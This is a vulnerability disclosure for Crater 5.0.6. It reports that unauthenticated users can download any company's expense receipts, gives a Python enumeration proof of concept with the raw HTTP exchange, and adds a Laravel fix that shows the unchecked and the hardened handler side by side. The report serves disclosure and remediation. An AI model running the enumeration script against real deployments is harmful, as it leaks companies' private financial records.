Improper Access Control in crater-invoice/crater
Reported on Dec 29th 2021
Description
In the recent Crater version (faf1ef09, tag: 5.0.6) I discovered that an unauthenticated user can download all expense receipts uploaded to any company.
Proof of Concept
import requests

# Walk expense ids and request each receipt with no session cookie or token;
# a 200 means the server served the file to an anonymous client.
for i in range(1, 100):
    r = requests.get(f'http://172.17.0.1:8080/expenses/{i}/download-receipt')
    if r.status_code == 200:
        print(f'Downloaded receipt for expense No.{i}')
Vulnerable request:
GET /expenses/2/download-receipt HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Host: 172.17.0.1:8080
Date: Wed, 29 Dec 2021 19:26:07 GMT
Connection: close
X-Powered-By: PHP/8.0.14
Cache-Control: public
Date: Wed, 29 Dec 2021 19:26:07 GMT
Last-Modified: Wed, 29 Dec 2021 19:15:13 GMT
Content-Disposition: attachment; filename=Sample.pdf
Content-Type: application/pdf
Content-Length: 65695
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InNZRUpvRFo0T0cxNHVmdkxvZEFDRlE9PSIsInZhbHVlIjoia1dGYld4MUdNVFVEOGNTa0NDQkZvNTdCU093WUhTbVhkWkhLMDRRYTZXUHJVYjNIZ0pxSGF2dHp4ZDFpYjZKSDAvWFVEVmJDRDBWR3hVNHJZSDdvYk1PeTZhdGlMcmxLcUNBUkhweW80V2V4VHhJWlhRVDVkWll3VDBaZ3VmbWQiLCJtYWMiOiJlNGQ4NjBmMjdlNDJkZTk2NTk0NzZjODgwZTllZDZlM2M1MmE1Zjc5NjZkYjgyZjJiNTE4ZDUyOWM5MGZlYjE5IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6InV1aTZPVFlGZzNSNFFieHRnZVVzMVE9PSIsInZhbHVlIjoiNE5zMEZiNWlWVzBRRU5zdkljTi9acjFtT3lJNFpDeWJjSk9hZ1luRm9lSVgvVWc3OEJNcDhUcFJMMmNGQUVUbm9yd3FrY3dyOG5YQ0JPR1Zjamlpb1Zqd3VkUlM1YTU2bThLWEpGZDNIeHBpN3FlbDZMMEQ2M0xNZUpWd1F1QnQiLCJtYWMiOiIwN2M5NjI2YzZkY2UxNWEyOGY4M2VkM2U0ZDFkNDE3NWY4ZTVjZTY2NjhjZmMwZjM5ZmQ0NTA2MzEwNDYzNjY3IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
%PDF-1.4
%äüöÃ
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
...
Impact
This vulnerability allows anyone, without authentication, to download every expense receipt stored by the application, regardless of which company uploaded it.
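Added example, not code from the Crater project: a Laravel controller and route in the shape the fix needs, with the unchecked variant beside the checked one. It assumes an Expense Eloquent model with company_id and receipt_path columns and a users.company_id column; those names are assumptions, not Crater's schema.

```php
<?php
// Added example, not Crater's own code. It shows the access control the report
// describes as missing: a logged-in user limited to receipts of their own
// company. Assumed (hypothetical) names: Expense model with company_id and
// receipt_path columns, and a users.company_id column.

namespace App\Http\Controllers;

use App\Models\Expense;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;
use Illuminate\Support\Facades\Storage;

class ExpenseReceiptController extends Controller
{
    // Vulnerable shape: whoever can reach the route gets the file.
    public function downloadUnchecked(int $id)
    {
        $expense = Expense::findOrFail($id);
        return Storage::download($expense->receipt_path);
    }

    // Hardened shape: require a logged-in user AND confirm the expense belongs
    // to that user's company. Both checks matter: authentication alone would
    // still let any account enumerate other companies' receipts by id.
    public function download(Request $request, int $id)
    {
        $user = $request->user();
        abort_unless($user, 401);

        // Scoping the lookup by company turns foreign ids into 404, so the
        // response does not reveal whether an id exists in another company.
        $expense = Expense::where('company_id', $user->company_id)->findOrFail($id);

        abort_unless($expense->receipt_path && Storage::exists($expense->receipt_path), 404);

        return Storage::download($expense->receipt_path, 'receipt-' . $expense->id . '.pdf');
    }
}

// routes/web.php: the auth middleware rejects unauthenticated requests before
// the controller runs, so the anonymous GET from the PoC never reaches the file.
Route::middleware('auth')
    ->get('/expenses/{id}/download-receipt', [ExpenseReceiptController::class, 'download']);
```

After applying the fix, rerunning the PoC above should yield redirects to the login page or 401/404 responses rather than any 200 with a PDF body.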